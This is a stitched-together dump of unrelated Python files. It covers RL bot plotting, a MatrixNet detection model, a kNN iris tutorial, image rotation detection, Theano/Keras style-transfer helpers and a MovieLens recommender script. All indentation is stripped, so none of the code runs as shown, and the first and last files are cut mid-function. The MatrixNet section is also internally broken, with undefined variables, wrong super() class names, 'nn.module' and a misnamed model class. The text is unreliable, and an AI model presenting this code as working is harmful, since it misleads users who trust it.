has_do = not size == 1 and net_cfg["Layer1"]["type"] == "do"
if has_do:
size /= 2
net_format += str(int(size))
if has_do:
net_format += "d"
return net_format
def create_graphs(bots=None):
if bots is None:
bots = get_bots()
for i, bot in enumerate(bots):
print("{0:d} out of {1:d} completed".format(i, len(bots)))
print("current:", bot)
desc = descriptor(bot, delimiter=",")
_, _, task, _, _ = desc.split(",")
src_dir = LOG_DIR + bot + "/"
save_dir = SAVE_DIR + "task " + task + "/" + desc + " - " + bot + "/"
if os.path.isdir(save_dir):
print("graphs already exist\n")
continue
else:
os.makedirs(save_dir)
show_all(src_dir, save_dir)
def create_graph(bot_name):
desc = descriptor(bot_name, delimiter=",")
_, _, task, _, _ = desc.split(",")
src_dir = LOG_DIR + bot_name + "/"
save_dir = SAVE_DIR + "task " + task + "/" + desc + " - " + bot_name + "/"
if os.path.isdir(save_dir):
print("graphs already exist")
return
else:
os.makedirs(save_dir)
show_all(src_dir, save_dir)
class BadBotError(Exception):
def __init__(self, bot_name, reason):
self.reason = reason
self.bot = bot_name
def __str__(self):
return self.bot + " was not valid because: " + self.reason
if __name__ == '__main__':
style.use("fivethirtyeight")
figure = plt.figure()
rows = 3
cols = 4
infos = [
{"title": "Estimation Errors Full", "file": "estimation_errors.csv", "plot_func": est_errs_full_plot},
{"title": "Estimation Errors Low", "file": "estimation_errors.csv", "plot_func": est_errs_low_plot},
{"title": "Averaged Estimation Errors", "file": "avrg_estimation_errors.csv", "plot_func": simple_averaged_plot},
{"title": "Rewards", "file": "rewards.csv", "plot_func": simple_averaged_plot},
{"title": "Iterations per Episode", "file": "episode_lengths.csv", "plot_func": simple_averaged_plot},
{"title": "Episode length", "file": "episode_times.csv", "plot_func": simple_averaged_plot},
{"title": "Q_Update length", "file": "mem_up_times.csv", "plot_func": simple_averaged_plot},
{"title": "Training lenght", "file": "train_times.csv", "plot_func": simple_averaged_plot},
{"title": "Net Output", "file": "net_output.csv", "plot_func": net_output_plot},
{"title": "States Differentials", "file": "state_diffs.csv", "plot_func": state_diff_plot},
{"title": "Q-Values", "file": ["q_values.csv", "pred_q_values.csv"], "plot_func": q_vals_plot}
]
bots_taxx = ["FlowBot_tob1535467552", 'FlowBot1536231138', 'FlowBot1536232921', 'FlowBot1536235613', 'FlowBot1536238030', 'FlowBot1536240328', 'FlowBot1536241818', 'FlowBot1536268211']
bot_type = "all"
bots = get_bots(net_type=None, bot_type=bot_type, task="tob", sarsa="s", neg_reward="n")
bots.append("FlowBot1536677070_a")
# create_graphs(["FlowBot1536677070_a"])
# create_graph("FlowBot1536268211")
ref = 0.0 ** 2
reward_comparison(bots, norm_len=100, norm_y=True, n_points=25, ref=ref, legend=True)
# action_summation(bots, n_actions=len(gi.get_action_states(bot_type)))
# rare_actions(bots, n_actions=len(gi.get_action_states(bot_type)))
# avrg_episode_length(bots)
# fix_neg_reward()
|
<reponame>rra94/maskmatrix
import math
import torch
import torch.nn as nn
import torch.nn.functional as F
from .py_utils.loss_utils import _regr_loss, _neg_loss
from torch.autograd import Variable
from .resnet_features import resnet152_features, resnet50_features, resnet18_features, resnet101_features, resnext101_32x8d, wide_resnet101_2
from .py_utils.utils import conv1x1, conv3x3
from .matrixnet import _sigmoid, MatrixNet, _gather_feat, _tranpose_and_gather_feat, _topk, _nms
class SubNet(nn.Module):
def __init__(self, mode, depth=4,
base_activation=F.relu,
output_activation=F.sigmoid):
super(SubNet, self).__init__()
self.depth = depth
self.base_activation = base_activation
self.output_activation = output_activation
self.subnet_base = nn.ModuleList([conv3x3(256, 256, padding=1)
for _ in range(depth)])
if mode == 'corners':
self.subnet_output = conv3x3(256, 4, padding=1)
if mode == 'tl_corners':
self.subnet_output = conv3x3(256, 2, padding=1)
if mode == 'br_corners':
self.subnet_output = conv3x3(256, 2, padding=1)
if mode == 'classes':
# add an extra dim for confidence
self.subnet_output = conv3x3(256, 1, padding=1)
def forward(self, x):
for layer in self.subnet_base:
x = self.base_activation(layer(x))
x = self.subnet_output(x)
return x
#this is main 2 stage module
class MatrixNet2Stage(nn.Module):
def __init__(self,classes, resnet, rpn_head, roi, layers):
self.backbone = MatrixNetAnchorsBackbone(resnet, layers)
self.rpn = MaxtrixNetAnchorsRPN(classes, self.backbone, layers)
self.roi = MatrixNetsAnchorsROI()
self.predictor = MatrixNetPredictor()
rpn_pre_nms_top_n = dict(training=rpn_pre_nms_top_n_train, testing=rpn_pre_nms_top_n_test)
rpn_post_nms_top_n = dict(training=rpn_post_nms_top_n_train, testing=rpn_post_nms_top_n_test)
super(MatrixNets2Stage, self).__init__(backbone, rpn, roi_heads, transform)
#this is the feature extractor
class MatrixNetAnchorsBackbone(nn.Module):
def __init__(self, resnet, layers):
super(MatrixNetAnchors, self).__init__()
self.resnet = resnet
if self.resnet == "resnext101_32x8d":
_resnet = resnext101_32x8d(pretrained=True)
elif self.resnet == "resnet101":
_resnet = resnet101_features(pretrained =True)
elif self.resnet == "resnet50":
_resnet = resnet50_features(pretrained =True)
elif self.resnet == "resnet152":
_resnet = resnet152_features(pretrained =True)
try:
self.matrix_net = MatrixNet(_resnet, layers)
except :
print("ERROR: ivalid resnet")
sys.exit()
def forward(self, x):
features = self.matrix_net(x)
return features
#this is the RPN
class MatrixNetAnchorsRPN(nn.Module):
def __init__(self, classes, features, layers):
super(MatrixNetAnchors, self).__init__()
self.features = features
self.subnet_tl_corners_regr = SubNet(mode='tl_corners')
self.subnet_br_corners_regr = SubNet(mode='br_corners')
self.subnet_anchors_heats = SubNet(mode='objectness')
def forward(self, x):
anchors_tl_corners_regr = [self.subnet_tl_corners_regr(feature) for feature in self.features]
anchors_br_corners_regr = [self.subnet_br_corners_regr(feature) for feature in self.features]
anchors_heatmaps = [_sigmoid(self.subnet_anchors_heats(feature)) for feature in self.features]
return anchors_heatmaps, anchors_tl_corners_regr, anchors_br_corners_regr
# This is the prediction layer
class MatrixNetPredictor(nn.module):
def __init__(self, in_channels, num_classes):
super(FastRCNNPredictor, self).__init__()
self.cls_score = nn.Linear(in_channels, num_classes)
self.bbox_pred = nn.Linear(in_channels, num_classes * 4)
def forward(self, x):
if x.dim() == 4:
assert list(x.shape[2:]) == [1, 1]
x = x.flatten(start_dim=1)
scores = self.cls_score(x)
bbox_deltas = self.bbox_pred(x)
return scores, bbox_deltas
#this is trainer
class model(nn.Module):
def __init__(self, db):
super(model, self).__init__()
classes = db.configs["categories"]
resnet = db.configs["backbone"]
layers = db.configs["layers_range"]
self.net = MatrixNet2stage(classes, resnet, layers)
self._decode = _decode
def _train(self, *xs):
image = xs[0][0]
anchors_inds = xs[1]
outs = self.net.forward(image)
for ind in range(len(anchors_inds)):
outs[1][ind] = _tranpose_and_gather_feat(outs[1][ind], anchors_inds[ind])
outs[2][ind] = _tranpose_and_gather_feat(outs[2][ind], anchors_inds[ind])
return outs
def _test(self, *xs, **kwargs):
image = xs[0][0]
outs = self.net.forward(image)
return self._decode(*outs, **kwargs)
def forward(self, *xs, **kwargs):
if len(xs) > 1:
return self._train(*xs, **kwargs)
return self._test(*xs, **kwargs)
class MatrixNetAnchorsLoss(nn.Module):
def __init__(self, corner_regr_weight=1, center_regr_weight=0.1, focal_loss=_neg_loss):
super(MatrixNetAnchorsLoss, self).__init__()
self.corner_regr_weight = corner_regr_weight
self.center_regr_weight = center_regr_weight
self.focal_loss = focal_loss
self.regr_loss = _regr_loss
def forward(self, outs, targets):
# focal loss
focal_loss = 0
corner_regr_loss = 0
anchors_heats = outs[0]
anchors_tl_corners_regrs = outs[1]
anchors_br_corners_regrs = outs[2]
gt_anchors_heat = targets[0]
gt_tl_corners_regr = targets[1]
gt_br_corners_regr = targets[2]
gt_mask = targets[3]
numf = 0
numr = 0
for i in range(len(anchors_heats)):
floss, num = self.focal_loss([anchors_heats[i]], gt_anchors_heat[i])
focal_loss += floss
numf += num
rloss, num = self.regr_loss(anchors_br_corners_regrs[i], gt_br_corners_regr[i], gt_mask[i])
numr += num
corner_regr_loss += rloss
rloss, num = self.regr_loss(anchors_tl_corners_regrs[i], gt_tl_corners_regr[i], gt_mask[i])
numr += num
corner_regr_loss += rloss
if numr > 0:
corner_regr_loss = corner_regr_loss / numr
if numf > 0:
focal_loss = focal_loss / numf
loss = (focal_loss + corner_regr_loss)
return loss.unsqueeze(0)
loss = MatrixNetAnchorsLoss()
#this is predict module
def _decode(
anchors_heats, corners_tl_regrs, corners_br_regrs,
K=100, kernel=1, dist_threshold=0.2, num_dets=1000,layers_range = None,
output_kernel_size = None, output_sizes = None, input_size=None, base_layer_range=None
):
top_k = K
batch, cat, height_0, width_0 = anchors_heats[0].size()
for i in range(len(anchors_heats)):
anchors_heat = anchors_heats[i]
corners_tl_regr = corners_tl_regrs[i]
corners_br_regr = corners_br_regrs[i]
batch, cat, height, width = anchors_heat.size()
height_scale = height_0 / height
width_scale = width_0 / width
anchors_scores, anchors_inds, anchors_clses, anchors_ys, anchors_xs = _topk(anchors_heat, K=K)
anchors_ys = anchors_ys.view(batch, K, 1)
anchors_xs = anchors_xs.view(batch, K, 1)
if corners_br_regr is not None:
corners_tl_regr = _tranpose_and_gather_feat(corners_tl_regr, anchors_inds)
corners_tl_regr = corners_tl_regr.view(batch, K, 1, 2)
corners_br_regr = _tranpose_and_gather_feat(corners_br_regr, anchors_inds)
corners_br_regr = corners_br_regr.view(batch, K, 1, 2)
min_y, max_y, min_x, max_x = map(lambda x:x/8/2,base_layer_range) #This is the range of object sizes within the layers
# We devide by 2 since we want to compute the distances from center to corners.
tl_xs = anchors_xs - (((max_x - min_x) * corners_tl_regr[..., 0]) + (max_x + min_x)/2)
tl_ys = anchors_ys - (((max_y - min_y) * corners_tl_regr[..., 1]) + (max_y + min_y)/2)
br_xs = anchors_xs + (((max_x - min_x) * corners_br_regr[..., 0]) + (max_x + min_x)/2)
br_ys = anchors_ys + (((max_y - min_y) * corners_br_regr[..., 1]) + (max_y + min_y)/2)
bboxes = torch.stack((tl_xs, tl_ys, br_xs, br_ys), dim=3)
scores = anchors_scores.view(batch, K, 1)
width_inds = (br_xs < tl_xs)
height_inds = (br_ys < tl_ys)
scores[width_inds] = -1
scores[height_inds] = -1
scores = scores.view(batch, -1)
scores, inds = torch.topk(scores, min(num_dets, scores.shape[1]))
scores = scores.unsqueeze(2)
bboxes = bboxes.view(batch, -1, 4)
bboxes = _gather_feat(bboxes, inds)
clses = anchors_clses.contiguous().view(batch, -1, 1)
clses = _gather_feat(clses, inds).float()
#
bboxes[:, :, 0] *= width_scale
bboxes[:, :, 1] *= height_scale
bboxes[:, :, 2] *= width_scale
bboxes[:, :, 3] *= height_scale
if i == 0:
detections = torch.cat([bboxes, scores,scores,scores, clses], dim=2)
else:
detections = torch.cat([detections, torch.cat([bboxes, scores,scores,scores, clses], dim=2)], dim = 1)
top_scores, top_inds = torch.topk(detections[:, :, 4], 300)
detections = _gather_feat(detections, top_inds)
return detections
|
"""
k nearest neighbors
欧式距离 distance = sqrt((x1 - x2)^2 + (y1 - y2)^2 + (z1 - z3)^2)
k太小, 容易受到异常点影响
k太大, 容易受到样本不均衡的影响
优点是无需训练, 简单易用
缺点是计算量大, 内存开销大, 不易确定k的精度
"""
from sklearn.datasets import load_iris
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
from sklearn.neighbors import KNeighborsClassifier
def knn_test():
"""
sepal length 萼片长度
sepal width 萼片宽度
petal length 花瓣长度
petal width 花瓣宽度
iris-setosa 山鸢尾
iris-versicolour 变色鸢尾
iris-virginica 维吉尼亚鸢尾
"""
# 加载数据 data特征值(判断的参数), target目标值(判断的结果/标签)
iris = load_iris()
# print(iris)
# 划分数据集
# train_test_split的参数是, data特征值(判断的参数), target目标值(判断的结果/标签), test_size是百分比, random_state是随机数种子
# 返回的的变量是 训练集, 测试集, 训练集目标, 测试集目标
data_train, data_test, target_train, target_test = \
train_test_split(iris.data, iris.target, test_size=0.2, random_state=4)
ss = StandardScaler()
# 对数据集进行标准化, 抛开浮动较大数据对整体的影响
data_train = ss.fit_transform(data_train)
# 在这里, 期望使用[训练集]的平均值和标准差, 来计算[测试集]的标准化结果
# 也即是, 通过一套相同的平均值和标准差, 来分别计算[训练集]和[测试集], 使得二者被处理的情况一致
# 所以, 要保留[训练集]用过的[fit], 也就是这里的ss, 用在[测试集]的[transform]上
data_test = ss.transform(data_test)
# 使用knn, n_neighbors的值是算法所指的邻居数量, 得到预估结果
k = KNeighborsClassifier(n_neighbors=3)
# 这里的k, 是一个预估器, 使用k.fit(训练集, 训练目标)进行训练, 得到拟合模型
k.fit(data_train, target_train)
# 使用已经训练好的预估器k, 通过predict()来测试测试集数据, 得到测试集数据的预估目标标签
target_predict = k.predict(data_test)
print("原始数据的测试集的标签target_test是")
print(target_test)
print("训练得出的预估目标标签target_predict是")
print(target_predict)
# 比对预估器生成的目标和原始数据的测试集目标是否一致
print(target_predict == target_test)
# 返回测试数据和测试标签的平均精度
print(k.score(data_test, target_test))
return None
if __name__ == '__main__':
knn_test()
|
<reponame>romybompart/Image-Processing-in-Sublime-Text-3<filename>Activity_11_0_Rotation_Dectection.py<gh_stars>1-10
import skimage
from skimage.color import rgb2gray
from skimage import data, io
import matplotlib.pyplot as plt
import matplotlib
matplotlib.rcParams['font.size'] = 18
import numpy as np
import os
def kernel_creator(kernel_s,kernel_v=1, f_type=1):
kernel = np.ones(kernel_s*kernel_s).reshape(kernel_s,kernel_s)
if f_type ==1 : #paso bajo
kernel = kernel * kernel_v
elif f_type ==2: # paso bajo dando peso al medio
kernel[0,0] = 0
kernel[kernel_s-1,0] = 0
kernel[0,kernel_s-1] = 0
kernel[round((kernel_s-1)/2),round((kernel_s-1)/2)] = kernel_v
kernel[(kernel_s-1),(kernel_s-1) ]=0
elif f_type == 3: #paso alto dando peso en al medio
kernel = kernel * -1
kernel[round((kernel_s-1)/2),round((kernel_s-1)/2)] = kernel_v
elif f_type == 4: #paso alto con variacion de peso al medio
kernel = kernel * - 2
kernel[0,0] = 1
kernel[kernel_s-1,0] = 1
kernel[0,kernel_s-1] = 1
kernel[round((kernel_s-1)/2),round((kernel_s-1)/2)] = kernel_v
kernel[(kernel_s-1),(kernel_s-1) ]=1
elif f_type == 5: #paso alto con variacion de peso al medio
kernel = kernel * -1
kernel[0,0] = 0
kernel[kernel_s-1,0] = 0
kernel[0,kernel_s-1] = 0
kernel[round((kernel_s-1)/2),round((kernel_s-1)/2)] = kernel_v
kernel[(kernel_s-1),(kernel_s-1) ]=0
elif f_type ==6: #for segmentation horizontal
kernel = kernel * 0
kernel [round((kernel_s-1)/2),round((kernel_s-1)/2):] = -1
kernel[round((kernel_s-1)/2),round((kernel_s-1)/2)] = 1
elif f_type ==7: #for segmentation vertical
kernel = kernel * 0
kernel [:round((kernel_s-1)/2),round((kernel_s-1)/2)] = -1
kernel[round((kernel_s-1)/2),round((kernel_s-1)/2)] = 1
else:
kernel = 0
return kernel
def mediana(matrix):
l = np.shape(matrix)[0] * np.shape(matrix)[0]
vector = np.sort(matrix.reshape(l))
m_p = round(l/2)
if ( l%2 ==0 ):
median = (vector[m_p] + vector[m_p-1]) /2
else:
median = (vector[m_p])
return median
def pad_with(vector, pad_width, iaxis, kwargs):
pad_value = kwargs.get('padder', 0)
vector[:pad_width[0]] = pad_value
vector[-pad_width[1]:] = pad_value
def filter_application(image,kernel_size=3, kernel_value=1, filter_type=0):
if( round(kernel_size,0) <2):
return "error: the kernel size should be higher than 3"
print ("filter type: ", filter_type)
if filter_type ==0 :
row, col = np.shape(image)
else:
kernel = kernel_creator (kernel_size,kernel_value,filter_type)
print ( "...the kernel that you are using...")
print ( kernel )
padimage = np.pad(image,kernel_size, pad_with)
row, col = np.shape(padimage)
filtered_image = np.empty([row-kernel_size-1, col-kernel_size-1])
for i in range(row-kernel_size-1):
for j in range(col-kernel_size-1):
if filter_type ==0:
subm_ = image[ i:kernel_size+i , j:kernel_size+j]
median = mediana(subm_)
filtered_image[i,j] = median
elif filter_type == 3:
subm_ = padimage[ i:kernel_size+i , j:kernel_size+j]
mult_ = np.multiply(subm_,kernel)
filter_ = np.sum(mult_) / kernel_value
filtered_image[i,j] = filter_
else:
subm_ = padimage[ i:kernel_size+i , j:kernel_size+j]
mult_ = np.multiply(subm_,kernel)
filter_ = np.sum(mult_) / np.sum(np.absolute(kernel))
filtered_image[i,j] = filter_
return filtered_image
def segmentation (image, kernel_s = 3):
if( round(kernel_s,0) <2):
return "error: the kernel size should be higher than 3"
kernel_A = kernel_creator(kernel_s, f_type = 6)
kernel_B = kernel_creator(kernel_s, f_type = 7)
padimage = np.pad(image,kernel_s, pad_with)
row, col = np.shape(padimage)
segmented_image = np.empty([row-kernel_s-1, col-kernel_s-1])
for i in range(row-kernel_s-1):
for j in range(col-kernel_s-1):
subm_ = padimage[ i:kernel_s+i , j:kernel_s+j]
a = np.sum(np.multiply(subm_,kernel_A))
b = np.sum(np.multiply(subm_,kernel_B))
r = a-b
segmented_image[i,j] = r
return np.abs(segmented_image)
def varianzas(data,image):
L = len ( data )
a, b = np.shape(image)
ntp = a*b
y = np.arange(L)
Varianzas = np.zeros([L])
for i in range (L):
R1 = sum ( data[0:i])
R2 = ntp - R1
if (R1 == 0):
m1 = 0
else:
m1 = sum (data[0:i] * y[0:i])/R1
if (R2==0):
m2 =0
else:
m2 = sum ( data[i+1:L]*y[i+1:L])/R2
Varianzas[i] = (R1*R2*(m2-m1))
return Varianzas
def whereMax(vm):
max_v = max ( vm )
n = len ( vm )
for i in range ( n ):
if ( vm[i] == max_v ):
return i
return "error"
def histogram(image):
bins = np.zeros([255])
a, b = np.shape(image)
for k in range(a):
for i in range (b):
bins[round(int(image[k,i]),0)] = 1 + bins[round(int(image[k,i]),0)]
return bins
def binarization(image, middle):
a, b = np.shape(image)
binarized = np.empty([a, b])
for k in range(a):
for i in range (b):
if (image[k,i]>=middle):
binarized[k,i] = 255
else:
binarized[k,i]=0
return binarized
def optimal_binarization(image):
his = histogram(image)
vm = varianzas(his, image)
pos_vm = whereMax(vm)
binimage = binarization( image,pos_vm)
return binimage
def area(image):
return np.sum(image)
def invert(image):
return np.abs((image/255) - 1)
def centroide(image):
image = invert(image)
yis,xis = np.nonzero(image)
x = xis.mean()
y = yis.mean()
return (x,y)
def centroide2(image):
row, col = np.shape(image)
ci = np.zeros(row)
cj = np.zeros(col)
image = invert(image)
area_ = area(image)
for i in range(row):
for j in range (col):
ci[i] = i*image[i,j] + ci[i]
cj[j] = j*image[i,j] + cj[j]
y = np.sum(ci)/area_
x = np.sum(cj)/area_
return (x,y)
def signature(image,centroide_x, centroide_y ):
y1,x1 = np.nonzero(image)
x = np.abs(x1-centroide_x)
y = np.abs(y1-centroide_y)
arg1, arg2 = np.power(x,2) , np.power(y,2)
r = np.power((arg1+arg2),1/2)
max_x = x[np.argmax(r)]
max_y = y[np.argmax(r)]
return r, max_x, max_y
filename = os.path.join('images/square_paint.png')
imageRGB = io.imread(filename)
#imageRGB = data.astronaut()
#plt.figure()
#plt.imshow(image)
#plt.show()
image = rgb2gray(imageRGB)
row, col = np.shape(image)
alpha = 45
alpha_rad = np.pi * alpha / 180
cx = col/2
cy = row/2
dx = cx - cx*np.cos(alpha_rad) - cy*np.sin(alpha_rad)
dy = cy + cx*np.sin(alpha_rad) - cy*np.cos(alpha_rad)
rot_m = np.matrix([[np.cos(alpha_rad), np.sin(alpha_rad), dx],\
[-np.sin(alpha_rad), np.cos(alpha_rad), dy]])
p0 = np.round(rot_m * np.array([0,0,1]).reshape(3,1),0).astype(int) # x0,y0
p1 = np.round(rot_m * np.array([col,0,1]).reshape(3,1),0).astype(int) # x1,y0
p2 = np.round(rot_m * np.array([0,row,1]).reshape(3,1),0).astype(int) # x0,y1
p3 = np.round(rot_m * np.array([col,row,1]).reshape(3,1),0).astype(int) # x0,y0
p = [p0,p1,p2,p3]
i=0
print ("rotation ange...")
print ( str(alpha) + "degrees")
print ( "checking Rotated vertex...")
for items in p:
print ("point : ", i)
print ("x: {} , y: {}".format(items[0],items[1]))
i+=1
print ( "image center...")
print ("x: {} , y: {}".format(cx,cy))
print ( "image size...")
print ("x: {} , y: {}".format(col,row))
a = np.array(p).reshape(4,2)
pmin = np.min(a,0)
pmax = np.max(a,0)
print ( "min point...")
print ( pmin )
print ( "max point...")
print ( pmax )
new_col = pmax[0]-pmin[0]
new_row = pmax[1]-pmin[1]
print ("the new image rotaged will have shape of")
print ("x: {}, y: {}".format(new_col, new_row))
rot = np.ones((new_row,new_col))
#rot = np.ones((row+1,col+1))
for x in range ( col ):
for y in range (row):
p = np.round(rot_m * np.array([x,y,1]).reshape(3,1),0).astype(int)
x_ = p[0] + np.abs(pmin[0])
y_ = p[1] + np.abs(pmin[1])
try:
rot[y_,x_] = image[y,x]
except:
pass
#print ("x = {}, y = {}, x_ = {}, y_ = {}".format(x,y,x_,y_))
rot = filter_application(rot,kernel_size=3,filter_type=0)
x1 = int((new_col-col)/2)
x2 = int(new_col - x1)
y1 = int((new_row-row)/2)
y2 = int(new_row - y1)
rot = rot[x1:x2,y1:y2]
plt.figure()
plt.subplot(1,2,1)
plt.title("Original")
plt.imshow(image, cmap='gray')
plt.subplot(1,2,2)
plt.title("Rotated")
plt.imshow(rot, cmap='gray')
plt.show()
oseg = segmentation (image, kernel_s = 3)
rseg = segmentation (rot, kernel_s = 3)
cen_o_x, cen_o_y = centroide(image)
osig , xmax_o, ymax_o = signature(oseg,cen_o_x, cen_o_y)
rsig , xmax_r, ymax_r = signature(rseg,cen_o_x, cen_o_y)
plt.plot(osig, 'r')
y_c = np.ones(np.shape(osig)[0])*np.average(osig)
y_line = np.arange(0, np.shape(osig)[0], 1)
plt.plot(y_line, y_c, 'y--')
plt.show()
plt.figure()
plt.subplot(1,3,1)
plt.title("Segmented 1 ")
plt.imshow(oseg, cmap='gray')
plt.subplot(1,3,2)
plt.title("Segmented 2")
plt.imshow(rseg, cmap='gray')
plt.subplot(1,3,3)
plt.title("signature")
plt.plot(osig, 'r')
y_c = np.ones(np.shape(osig)[0])*np.average(osig)
y_line = np.arange(0, np.shape(osig)[0], 1)
plt.plot(y_line, y_c, 'y--')
plt.tight_layout(pad=0.4, w_pad=0.5)
plt.show()
dx1 = xmax_o -cen_o_x
dy1 = ymax_o-cen_o_y
tetha1=np.degrees(np.arctan(dy1/dx1))
dx2 = xmax_r-cen_o_x
dy2 = ymax_r-cen_o_y
tetha2=np.degrees(np.arctan(dy2/dx2))
tetha = tetha2-tetha1
print ( "rotation")
print(tetha) |
import sys
import theano
import theano.tensor as T
import numpy as np
from scipy.misc import imread, imsave, imresize
from scipy.ndimage.filters import median_filter
from keras.applications import VGG16, VGG19, ResNet50
floatX = theano.config.floatX
models_table = {
"vgg16": VGG16,
"vgg19": VGG19,
"resnet50": ResNet50,
}
def subtract_imagenet_mean(img):
"""Subtract ImageNet mean pixel-wise from a BGR image."""
img[0, :, :] -= 103.939
img[1, :, :] -= 116.779
img[2, :, :] -= 123.68
def add_imagenet_mean(img):
"""Add ImageNet mean pixel-wise to a BGR image."""
img[0, :, :] += 103.939
img[1, :, :] += 116.779
img[2, :, :] += 123.68
def load_and_preprocess_img(filename, size=None, center_crop=False):
"""Load an image, and pre-process it as needed by models."""
try:
img = imread(filename, mode="RGB")
except OSError as e:
print(e)
sys.exit(1)
if center_crop:
# Extract a square crop from the center of the image.
cur_shape = img.shape[:2]
shorter_side = min(cur_shape)
longer_side_xs = max(cur_shape) - shorter_side
longer_side_start = int(longer_side_xs / 2.)
longer_side_slice = slice(longer_side_start, longer_side_start + shorter_side)
if shorter_side == cur_shape[0]:
img = img[:, longer_side_slice, :]
else:
img = img[longer_side_slice, :, :]
if size is not None:
# Resize the image.
cur_shape = img.shape[:2]
shorter_side = min(cur_shape)
aspect = max(cur_shape) / float(shorter_side)
new_shorter_side = int(size / aspect)
if shorter_side == cur_shape[0]:
new_shape = (new_shorter_side, size)
else:
new_shape = (size, new_shorter_side)
img = imresize(img, new_shape)
# Bring the color dimension to the front, convert to BGR.
img = img.transpose((2, 0, 1))[::-1].astype(floatX)
subtract_imagenet_mean(img)
return img[np.newaxis, :]
def deprocess_img_and_save(img, filename):
"""Undo pre-processing on an image, and save it."""
img = img[0, :, :, :]
add_imagenet_mean(img)
img = img[::-1].transpose((1, 2, 0))
img = np.clip(img, 0, 255).astype(np.uint8)
img = median_filter(img, size=(3, 3, 1))
try:
imsave(filename, img)
except OSError as e:
print(e)
sys.exit(1)
def get_adam_updates(f, params, lr=10., b1=0.9, b2=0.999, e=1e-8, dec=5e-3, norm_grads=False):
"""Generate updates to optimize using the Adam optimizer with linear learning rate decay."""
t = theano.shared(0)
ms = [theano.shared(np.zeros(param.shape.eval(), dtype=floatX), borrow=True) for param in params]
vs = [theano.shared(np.zeros(param.shape.eval(), dtype=floatX), borrow=True) for param in params]
gs = T.grad(f, params)
if norm_grads:
gs = [g / (T.sum(T.abs_(g)) + 1e-8) for g in gs]
t_u = (t, t + 1)
m_us = [(m, b1 * m + (1. - b1) * g) for m, g in zip(ms, gs)]
v_us = [(v, b2 * v + (1. - b2) * T.sqr(g)) for v, g in zip(vs, gs)]
t_u_f = T.cast(t_u[1], floatX)
lr_hat = (lr / (1. + t_u_f * dec)) * T.sqrt(1. - T.pow(b2, t_u_f)) / (1. - T.pow(b1, t_u_f))
param_us = [(param, param - lr_hat * m_u[1] / (T.sqrt(v_u[1]) + e)) for m_u, v_u, param in zip(m_us, v_us, params)]
return m_us + v_us + param_us + [t_u]
|
from math import floor, ceil
from time import time
from pathlib import Path
from zipfile import ZipFile
from urllib.request import urlretrieve
from contextlib import contextmanager
import random
from pprint import pprint
import json
import numpy as np
import pandas as pd
import joblib
from sklearn.model_selection import ParameterGrid
from sklearn.model_selection import train_test_split
from sklearn.metrics import mean_squared_error
from sklearn.metrics import mean_absolute_error
import tensorflow as tf
from keras.layers import Input, Embedding, Flatten, merge, Dense, Dropout
from keras.layers import BatchNormalization
from keras.models import Model
from dask import delayed, compute
DEFAULT_LOSS = 'cross_entropy'
ML_100K_URL = "http://files.grouplens.org/datasets/movielens/ml-100k.zip"
ML_100K_FILENAME = Path(ML_100K_URL.rsplit('/', 1)[1])
ML_100K_FOLDER = Path('ml-100k')
RESULTS_FILENAME = 'results.json'
MODEL_FILENAME = 'model.h5'
if not ML_100K_FILENAME.exists():
print('Downloading %s to %s...' % (ML_100K_URL, ML_100K_FILENAME))
urlretrieve(ML_100K_URL, ML_100K_FILENAME.name)
if not ML_100K_FOLDER.exists():
print('Extracting %s to %s...' % (ML_100K_FILENAME, ML_100K_FOLDER))
ZipFile(ML_100K_FILENAME.name).extractall('.')
all_ratings = pd.read_csv(ML_100K_FOLDER / 'u.data', sep='\t',
names=["user_id", "item_id", "rating", "timestamp"])
DEFAULT_PARAMS = dict(
embedding_size=16,
hidden_size=64,
n_hidden=4,
dropout_embedding=0.3,
dropout_hidden=0.3,
use_batchnorm=True,
loss=DEFAULT_LOSS,
optimizer='adam',
batch_size=64,
)
COMMON_SEARCH_SPACE = dict(
embedding_size=[16, 32, 64, 128],
dropout_embedding=[0, 0.2, 0.5],
dropout_hidden=[0, 0.2, 0.5],
use_batchnorm=[True, False],
loss=['mse', 'mae', 'cross_entropy'],
batch_size=[16, 32, 64, 128],
)
SEARCH_SPACE = [
dict(n_hidden=[0], **COMMON_SEARCH_SPACE),
dict(n_hidden=[1, 2, 3, 4, 5],
hidden_size=[32, 64, 128, 256, 512],
**COMMON_SEARCH_SPACE),
]
def bootstrap_ci(func, data_args, ci_range=(0.025, 0.975), n_iter=10000,
random_state=0):
rng = np.random.RandomState(random_state)
n_samples = data_args[0].shape[0]
results = []
for i in range(n_iter):
# sample n_samples out of n_samples with replacement
idx = rng.randint(0, n_samples - 1, n_samples)
resampled_args = [np.asarray(arg)[idx] for arg in data_args]
results.append(func(*resampled_args))
results = np.sort(results)
return (results[floor(ci_range[0] * n_iter)],
results[ceil(ci_range[1] * n_iter)])
def make_model(user_input_dim, item_input_dim,
embedding_size=16, hidden_size=64, n_hidden=4,
dropout_embedding=0.3, dropout_hidden=0.3,
optimizer='adam', loss=DEFAULT_LOSS, use_batchnorm=True,
**ignored_args):
user_id_input = Input(shape=[1], name='user')
item_id_input = Input(shape=[1], name='item')
user_embedding = Embedding(output_dim=embedding_size,
input_dim=user_input_dim,
input_length=1,
name='user_embedding')(user_id_input)
item_embedding = Embedding(output_dim=embedding_size,
input_dim=item_input_dim,
input_length=1,
name='item_embedding')(item_id_input)
user_vecs = Flatten()(user_embedding)
item_vecs = Flatten()(item_embedding)
input_vecs = merge([user_vecs, item_vecs], mode='concat')
x = Dropout(dropout_embedding)(input_vecs)
for i in range(n_hidden):
x = Dense(hidden_size, activation='relu')(x)
if i < n_hidden - 1:
x = Dropout(dropout_hidden)(x)
if use_batchnorm:
x = BatchNormalization()(x)
if loss == 'cross_entropy':
y = Dense(output_dim=5, activation='softmax')(x)
model = Model(input=[user_id_input, item_id_input], output=y)
model.compile(optimizer='adam', loss='sparse_categorical_crossentropy')
else:
y = Dense(output_dim=1)(x)
model = Model(input=[user_id_input, item_id_input], output=y)
model.compile(optimizer='adam', loss=loss)
return model
@contextmanager
def transactional_open(path, mode='wb'):
tmp_path = path.with_name(path.name + '.tmp')
with tmp_path.open(mode=mode) as f:
yield f
tmp_path.rename(path)
@contextmanager
def transactional_fname(path):
tmp_path = path.with_name(path.name + '.tmp')
yield str(tmp_path)
tmp_path.rename(path)
def _compute_scores(model, prefix, user_id, item_id, rating, loss):
preds = model.predict([user_id, item_id])
preds = preds.argmax(axis=1) + 1 if loss == 'cross_entropy' else preds
mse = mean_squared_error(preds, rating)
mae = mean_absolute_error(preds, rating)
